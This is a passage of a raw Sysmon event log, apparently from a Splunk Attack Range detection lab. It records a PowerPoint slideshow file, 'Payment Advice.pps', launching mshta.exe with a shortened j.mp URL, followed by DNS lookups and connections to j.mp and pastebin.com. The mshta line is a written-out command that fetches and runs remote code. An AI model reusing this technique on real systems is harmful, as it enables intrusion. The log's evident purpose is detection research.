14:59:42.574{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.465{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7BF2C822BC0E8B99BF57462F7A92EF7,SHA256=BAEC866B51ED6E1441C83A7802C9ED4306B19254B3DAE47ABB6E8D5C13F05EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.449{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF93DED762F6B22F46.TMPMD5=041FD5891EC2C2AC9A051ADF06205649,SHA256=AC2015FE4DCB48E95D46D236B76DC14F72239EB0DDF02A05EDEAA734708F4E67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.449{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF55DDF6F104779A4D.TMPMD5=28C6D3931F2BDB69ABC43CFC03B4B9B2,SHA256=9BED5393078033FADD0DC2B9EA719FE82E71671A1304E41824BC36AF859066F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.434{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.418{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.402{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.402{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.387{A7A01FEF-B626-607E-1600-00000000BB01}15401312C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.387{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.371{A7A01FEF-EC53-607E-6B0F-00000000BB01}36283092C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(0000028B7E4B93B2) 154100x800000000000000082106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.377{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"mshta""https:\\j.mp\obi3zfngcbyc56rcegve"C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Temp\Payment Advice.pps" /ou "" 23542300x800000000000000082105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.121{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=430E8DF991DC067B56BCEC54CC588313,SHA256=CD7DFFDFA38460912EDACD7B156BFD09EE04FD6830009632D5CB2D0DEF330018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050825Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:42.900{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2BCD5EC8ED9D385A833D1671CF7FD86,SHA256=52A3AC438F824326F39FE02131365CDEB9BAC93ECD97F6E649C2AC60B44FC30B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.142{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com57759-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.062{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-34456-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:43.199{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4827C9D52A2A5DE46E5B64C38598302F,SHA256=917C4B6306F117D9E2957CEA5E7325B9679F5451948FB1C2BE38D92EEEC0E947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050829Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:43.903{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=886161DDFB562C4E939BC9E934EE3084,SHA256=65EE1CA07B0534969B93F6EAEF754AD97A2A174E715A0FDC2869999E3E5CBD8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050828Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:41.753{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57178-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050827Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:41.121{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50632-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050826Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:43.275{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75E4F6E9CBAD2529B11943B6FFA28286,SHA256=526BF2EBE49E0483F23EEA1AB3F9E114377B294C894EFD133462312C13CC5008,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000082158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.485{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520j.mp0::ffff:67.199.248.16;::ffff:67.199.248.17;C:\Windows\System32\mshta.exe 22542200x800000000000000082157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.485{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\mshta.exe 354300x800000000000000082156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.697{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57659-false52.114.76.35-443https 354300x800000000000000082155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.671{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56856- 354300x800000000000000082154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.488{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57657-false67.199.248.16j.mp443https 354300x800000000000000082153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.488{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57656-false67.199.248.16j.mp443https 354300x800000000000000082152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.488{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57658-false104.23.99.190-443https 23542300x800000000000000082151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.215{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D2B63F2FC4E4C81EBF66F5D6602B2F4,SHA256=D9EC8D6F0C4D9393DD98729400B2B228D07EF3677314929D62D3E91EBC1DAD7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050832Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:44.918{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA605C0A0FE77A19B0ECAF048DB0B08,SHA256=5A8B799D20515E4DC1B742EE64E8FB7A00E7CCBBAD8AB86B11FC6A62D01C9472,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 